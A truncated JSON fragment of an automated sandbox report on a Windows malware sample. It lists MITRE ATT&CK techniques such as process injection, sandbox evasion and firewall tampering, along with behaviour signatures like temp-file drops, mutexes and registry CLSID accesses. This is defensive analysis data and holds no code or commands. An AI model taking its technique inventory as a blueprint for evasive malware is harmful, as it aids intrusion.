1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rtmxemaq.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Computers and Devices\" (Path: 